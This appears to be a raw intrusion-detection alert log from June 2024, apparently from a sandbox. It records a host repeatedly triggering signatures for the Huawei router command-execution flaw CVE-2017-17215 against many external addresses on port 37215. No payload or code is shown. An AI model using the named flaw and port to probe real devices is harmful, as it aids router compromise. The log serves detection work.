                                                        06/13/24-21:32:50.613100TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5364237215192.168.2.14197.93.155.235
                                                        06/13/24-21:32:01.223730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3955037215192.168.2.14156.32.117.115
                                                        06/13/24-21:33:11.181656TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6005037215192.168.2.14156.115.199.216
                                                        06/13/24-21:32:01.242087TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5091637215192.168.2.1441.19.63.155
                                                        06/13/24-21:33:00.887434TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3812837215192.168.2.1441.75.203.181
                                                        06/13/24-21:32:25.976833TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5334437215192.168.2.14156.132.246.8
                                                        06/13/24-21:31:59.175842TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4608437215192.168.2.1441.168.245.248
                                                        06/13/24-21:32:25.991618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4635037215192.168.2.14197.147.194.3
                                                        06/13/24-21:32:52.669677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5660237215192.168.2.1441.153.42.25
                                                        06/13/24-21:32:54.711415TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3565437215192.168.2.14156.87.118.117
                                                        06/13/24-21:32:36.266640TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6090437215192.168.2.14156.156.234.16
                                                        06/13/24-21:33:02.914294TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5808837215192.168.2.14156.212.113.33
                                                        06/13/24-21:32:03.307393TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3910837215192.168.2.14197.225.71.30
                                                        06/13/24-21:32:36.248178TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3280437215192.168.2.14156.195.28.253
                                                        06/13/24-21:32:36.264042TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3649237215192.168.2.1441.238.146.249
                                                        06/13/24-21:32:36.269864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4631237215192.168.2.1441.48.27.152
                                                        06/13/24-21:32:50.614622TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5315837215192.168.2.1441.2.221.138
                                                        06/13/24-21:32:42.417843TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5052237215192.168.2.14197.102.169.216
                                                        06/13/24-21:32:50.610797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4589237215192.168.2.1441.117.204.122
                                                        06/13/24-21:32:07.419654TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4014237215192.168.2.14156.181.30.17
                                                        06/13/24-21:32:52.678131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3839837215192.168.2.14156.92.41.224
                                                        06/13/24-21:32:56.754621TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5108837215192.168.2.1441.99.89.194
                                                        06/13/24-21:33:02.913826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3557037215192.168.2.14197.94.97.182
                                                        06/13/24-21:32:46.527938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3514037215192.168.2.14197.32.6.248
                                                        06/13/24-21:33:04.987326TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5390837215192.168.2.14197.199.198.242
                                                        06/13/24-21:33:15.256821TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5183837215192.168.2.1441.107.177.139
                                                        06/13/24-21:33:13.228070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4776837215192.168.2.1441.2.10.83
                                                        06/13/24-21:32:19.727665TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5788237215192.168.2.14156.33.75.94
                                                        06/13/24-21:32:34.216765TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5829437215192.168.2.14197.64.226.64
                                                        06/13/24-21:32:50.628775TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3836037215192.168.2.14156.40.63.202
                                                        06/13/24-21:33:15.273059TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3791037215192.168.2.14156.191.53.44
                                                        06/13/24-21:32:32.165694TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3464837215192.168.2.14197.201.254.173
                                                        06/13/24-21:32:58.839924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4792037215192.168.2.14197.76.10.25
                                                        06/13/24-21:31:57.091232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5473437215192.168.2.14197.153.88.73
                                                        06/13/24-21:32:23.942733TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4153837215192.168.2.14197.142.13.158
                                                        06/13/24-21:33:15.257824TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3590237215192.168.2.14156.84.9.94
                                                        06/13/24-21:32:50.611448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5243037215192.168.2.1441.79.93.176
                                                        06/13/24-21:32:32.165064TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5236637215192.168.2.14156.233.18.155
                                                        06/13/24-21:33:02.911439TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6041437215192.168.2.14197.164.219.73
                                                        06/13/24-21:32:42.419369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5276437215192.168.2.14197.200.224.233
                                                        06/13/24-21:33:00.867910TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4306637215192.168.2.14197.28.17.235
                                                        06/13/24-21:31:59.174951TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5887437215192.168.2.14197.82.79.222
                                                        06/13/24-21:31:59.174348TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3457037215192.168.2.1441.62.52.162
                                                        06/13/24-21:32:19.751750TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5507037215192.168.2.14156.118.57.145
                                                        06/13/24-21:31:57.137824TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4345237215192.168.2.14156.155.54.24
                                                        06/13/24-21:32:25.971902TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5442837215192.168.2.1441.227.32.135
                                                        06/13/24-21:32:58.824419TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5609037215192.168.2.1441.59.150.141
                                                        06/13/24-21:33:07.042688TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3555837215192.168.2.1441.228.40.127
                                                        06/13/24-21:32:58.843739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5680837215192.168.2.1441.178.152.21
                                                        06/13/24-21:33:04.991273TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6077437215192.168.2.1441.163.167.252
                                                        06/13/24-21:32:54.710572TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5768437215192.168.2.14197.87.58.248
                                                        06/13/24-21:33:05.010761TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5118637215192.168.2.14197.154.23.100
                                                        06/13/24-21:32:03.278626TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6028237215192.168.2.1441.116.69.21
                                                        06/13/24-21:33:13.214604TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4382037215192.168.2.14156.61.65.67
                                                        06/13/24-21:32:15.607911TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4059037215192.168.2.14197.117.196.34
                                                        06/13/24-21:32:50.611166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3842437215192.168.2.14197.122.125.200
                                                        06/13/24-21:33:00.869765TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3686437215192.168.2.1441.113.78.59
                                                        06/13/24-21:32:44.474251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5007037215192.168.2.1441.177.28.250
                                                        06/13/24-21:32:42.404143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5054637215192.168.2.14156.214.187.242
                                                        06/13/24-21:32:28.025384TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4386437215192.168.2.14197.88.117.205
                                                        06/13/24-21:33:11.154116TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4670437215192.168.2.14156.235.220.212
                                                        06/13/24-21:33:09.089241TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4313437215192.168.2.1441.89.175.43
                                                        06/13/24-21:32:25.976621TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4188037215192.168.2.14156.6.206.235
                                                        06/13/24-21:32:54.706989TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4146637215192.168.2.14156.206.30.137
                                                        06/13/24-21:33:05.010834TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5006237215192.168.2.1441.241.22.147
                                                        06/13/24-21:32:50.613159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3701237215192.168.2.14156.193.229.68
                                                        06/13/24-21:33:07.059449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4190437215192.168.2.14197.225.96.109
                                                        06/13/24-21:32:15.610506TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3655437215192.168.2.14156.30.213.191
                                                        06/13/24-21:32:21.787514TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3651237215192.168.2.14197.250.197.124
                                                        06/13/24-21:32:17.671582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4571837215192.168.2.1441.3.245.23
                                                        06/13/24-21:33:09.107870TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3602437215192.168.2.1441.119.149.172
                                                        06/13/24-21:33:11.155910TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5613037215192.168.2.14156.154.25.253
                                                        06/13/24-21:31:59.197444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3890637215192.168.2.14197.40.176.8
                                                        06/13/24-21:32:09.440060TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4319837215192.168.2.1441.212.131.7
                                                        06/13/24-21:32:21.781574TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6067637215192.168.2.1441.41.37.6
                                                        06/13/24-21:32:36.245532TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4986637215192.168.2.1441.43.91.194
                                                        06/13/24-21:33:11.158705TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4398837215192.168.2.1441.88.75.141
                                                        06/13/24-21:32:46.509768TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4467637215192.168.2.14197.38.45.175
                                                        06/13/24-21:32:52.656299TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5589837215192.168.2.1441.125.50.106
                                                        06/13/24-21:32:54.725088TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4398237215192.168.2.1441.20.49.174
                                                        06/13/24-21:32:11.507706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5998437215192.168.2.1441.161.215.81
                                                        06/13/24-21:32:44.477433TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4446437215192.168.2.14197.236.163.33
                                                        06/13/24-21:33:17.306517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3909437215192.168.2.14156.157.241.241
                                                        06/13/24-21:32:23.944034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3886837215192.168.2.14156.214.33.78
                                                        06/13/24-21:32:30.095346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5994237215192.168.2.1441.100.113.147
                                                        06/13/24-21:32:30.127030TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3478837215192.168.2.1441.9.241.252
                                                        06/13/24-21:32:17.695102TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5778037215192.168.2.14156.241.145.185
                                                        06/13/24-21:33:09.087285TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3280037215192.168.2.14156.40.189.53
                                                        06/13/24-21:32:05.349135TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5446837215192.168.2.14156.193.174.76
                                                        06/13/24-21:32:40.377016TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3468637215192.168.2.14197.114.123.19
                                                        06/13/24-21:32:28.027794TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3714037215192.168.2.14197.104.30.23
                                                        06/13/24-21:32:19.750702TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4343037215192.168.2.14197.63.52.30
                                                        06/13/24-21:32:19.752985TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5077237215192.168.2.14156.160.210.227
                                                        06/13/24-21:33:15.251639TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4743437215192.168.2.14197.129.58.123
                                                        06/13/24-21:31:57.092105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4787837215192.168.2.1441.202.231.52
                                                        06/13/24-21:33:02.910246TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3469237215192.168.2.14197.13.223.14
                                                        06/13/24-21:33:04.991688TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3756637215192.168.2.14197.24.165.58
                                                        06/13/24-21:32:17.674323TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5403037215192.168.2.1441.246.165.35
                                                        06/13/24-21:32:40.377559TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3618237215192.168.2.14156.172.106.118
                                                        06/13/24-21:33:00.870655TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4955237215192.168.2.14156.187.199.122
                                                        06/13/24-21:32:15.611067TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4897837215192.168.2.14197.29.250.59
                                                        06/13/24-21:33:11.178082TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5244837215192.168.2.14197.136.88.106
                                                        06/13/24-21:32:50.611309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5618037215192.168.2.1441.214.17.35
                                                        06/13/24-21:32:32.154715TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5902237215192.168.2.14197.181.25.160
                                                        06/13/24-21:32:25.970136TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5419837215192.168.2.14197.254.184.25
                                                        06/13/24-21:32:07.419930TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3635237215192.168.2.14156.17.72.28
                                                        06/13/24-21:32:03.280029TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4973437215192.168.2.14197.158.144.70
                                                        06/13/24-21:32:03.300884TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5925637215192.168.2.1441.215.215.91
                                                        06/13/24-21:32:19.728149TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5824237215192.168.2.14197.29.9.203
                                                        06/13/24-21:32:21.803067TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4377037215192.168.2.1441.237.83.191
                                                        06/13/24-21:32:21.802486TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3667237215192.168.2.1441.23.5.18
                                                        06/13/24-21:32:42.418205TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5057237215192.168.2.14197.14.50.120
                                                        06/13/24-21:32:58.839153TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4925437215192.168.2.1441.166.190.99
                                                        06/13/24-21:32:05.344859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4096637215192.168.2.1441.252.42.85
                                                        06/13/24-21:33:15.272355TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3861837215192.168.2.14197.229.139.168
                                                        06/13/24-21:32:46.527581TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3466037215192.168.2.14197.73.64.229
                                                        06/13/24-21:33:07.039190TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5279637215192.168.2.14197.45.23.31
                                                        06/13/24-21:32:01.224181TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5025437215192.168.2.1441.164.131.110
                                                        06/13/24-21:32:40.355610TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3959237215192.168.2.14197.112.166.234
                                                        06/13/24-21:31:59.197679TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4071037215192.168.2.14197.142.93.6
                                                        06/13/24-21:32:46.509660TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4543437215192.168.2.1441.53.212.65
                                                        06/13/24-21:32:52.678434TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3734037215192.168.2.14156.238.18.40
                                                        06/13/24-21:32:52.680720TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5536237215192.168.2.1441.181.65.190
                                                        06/13/24-21:31:59.177545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4849637215192.168.2.14156.99.248.102
                                                        06/13/24-21:33:09.090635TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5176637215192.168.2.14197.237.132.9
                                                        06/13/24-21:33:11.175131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3448437215192.168.2.14156.208.14.148
                                                        06/13/24-21:32:09.437168TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4723437215192.168.2.14156.91.3.203
                                                        06/13/24-21:33:13.231918TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3778037215192.168.2.1441.82.190.223
                                                        06/13/24-21:32:58.823079TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3368437215192.168.2.14197.115.115.176
                                                        06/13/24-21:32:46.528499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5113037215192.168.2.1441.194.7.23
                                                        06/13/24-21:32:40.372209TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4527837215192.168.2.14156.71.62.141
                                                        06/13/24-21:33:13.231315TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5046037215192.168.2.1441.169.126.236
                                                        06/13/24-21:32:52.677861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5985037215192.168.2.1441.128.61.121
                                                        06/13/24-21:33:07.041192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4583637215192.168.2.1441.81.143.39
                                                        06/13/24-21:32:19.749182TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5568037215192.168.2.1441.203.195.87
                                                        06/13/24-21:33:09.129386TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3920437215192.168.2.14156.89.232.8
                                                        06/13/24-21:32:07.418165TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5463437215192.168.2.14197.93.168.1
                                                        06/13/24-21:32:11.487858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5497637215192.168.2.14156.158.87.233
                                                        06/13/24-21:32:30.078360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5395437215192.168.2.14156.119.203.16
                                                        06/13/24-21:32:30.097565TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3476837215192.168.2.1441.130.158.26
                                                        06/13/24-21:32:40.356984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3609037215192.168.2.1441.83.178.152
                                                        06/13/24-21:33:15.252016TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5688437215192.168.2.14156.38.115.64
                                                        06/13/24-21:32:40.380261TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3551437215192.168.2.14156.85.34.18
                                                        06/13/24-21:32:48.555470TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5501037215192.168.2.14197.220.143.227
                                                        06/13/24-21:33:05.011456TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4848637215192.168.2.14156.181.151.83
                                                        06/13/24-21:32:28.048615TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4306237215192.168.2.14197.215.183.132
                                                        06/13/24-21:31:57.153558TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4097837215192.168.2.14197.197.236.157
                                                        06/13/24-21:32:05.370509TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4104637215192.168.2.14197.86.61.243
                                                        06/13/24-21:33:13.230828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4819437215192.168.2.1441.194.50.164
                                                        06/13/24-21:33:00.886927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4623237215192.168.2.14156.33.141.128
                                                        06/13/24-21:32:56.786221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4749237215192.168.2.1441.10.70.71
                                                        06/13/24-21:33:09.128898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5040037215192.168.2.14197.23.214.44
                                                        06/13/24-21:32:44.479836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3397837215192.168.2.1441.98.118.89
                                                        06/13/24-21:32:01.220853TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3767237215192.168.2.14156.86.152.11
                                                        06/13/24-21:32:17.697566TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3396237215192.168.2.14197.166.167.53
                                                        06/13/24-21:32:44.457702TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5489437215192.168.2.14156.155.203.213
                                                        06/13/24-21:33:02.935562TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4985237215192.168.2.1441.194.91.52
                                                        06/13/24-21:32:09.460112TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6010237215192.168.2.14197.50.213.153
                                                        06/13/24-21:33:00.871608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4610837215192.168.2.1441.188.19.123
                                                        06/13/24-21:33:00.889623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4754637215192.168.2.14156.247.162.52
                                                        06/13/24-21:32:13.568940TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4356037215192.168.2.14156.237.130.70
                                                        06/13/24-21:32:28.044590TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4535037215192.168.2.14197.216.61.165
                                                        06/13/24-21:33:15.271879TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4216437215192.168.2.14156.191.237.20
                                                        06/13/24-21:33:11.157536TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4983237215192.168.2.1441.188.44.8
                                                        06/13/24-21:33:05.011176TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4820237215192.168.2.1441.197.245.3
                                                        06/13/24-21:32:44.454156TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3807037215192.168.2.1441.57.128.109
                                                        06/13/24-21:31:59.198718TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3293837215192.168.2.14197.171.201.221
                                                        06/13/24-21:31:57.091682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4834437215192.168.2.1441.3.135.97
                                                        06/13/24-21:32:09.437227TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5970237215192.168.2.14197.216.254.219
                                                        06/13/24-21:33:00.871335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4394637215192.168.2.14156.230.207.51
                                                        06/13/24-21:32:05.350284TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3732837215192.168.2.14197.43.255.17
                                                        06/13/24-21:32:15.635010TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4644837215192.168.2.1441.187.166.205
                                                        06/13/24-21:32:44.454790TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3900637215192.168.2.14156.67.190.66
                                                        06/13/24-21:33:17.338120TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5628437215192.168.2.1441.30.135.185
                                                        06/13/24-21:32:42.404201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4852037215192.168.2.14156.206.197.194
                                                        06/13/24-21:31:57.154636TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4017837215192.168.2.1441.59.199.97
                                                        06/13/24-21:32:11.506083TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4416437215192.168.2.1441.134.241.104
                                                        06/13/24-21:32:09.438369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5305637215192.168.2.1441.116.120.117
                                                        06/13/24-21:32:38.303991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5402237215192.168.2.1441.34.110.146
                                                        06/13/24-21:32:07.400944TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5503637215192.168.2.14156.148.216.75
                                                        06/13/24-21:31:59.175314TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4003437215192.168.2.1441.197.76.241
                                                        06/13/24-21:32:11.486244TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3671637215192.168.2.14156.202.31.251
                                                        06/13/24-21:32:36.266433TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4406037215192.168.2.14197.116.109.200
                                                        06/13/24-21:31:57.091744TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3974437215192.168.2.1441.82.238.206
                                                        06/13/24-21:32:48.572970TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5650637215192.168.2.14197.172.167.86
                                                        06/13/24-21:32:58.821146TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4917437215192.168.2.14156.41.90.154
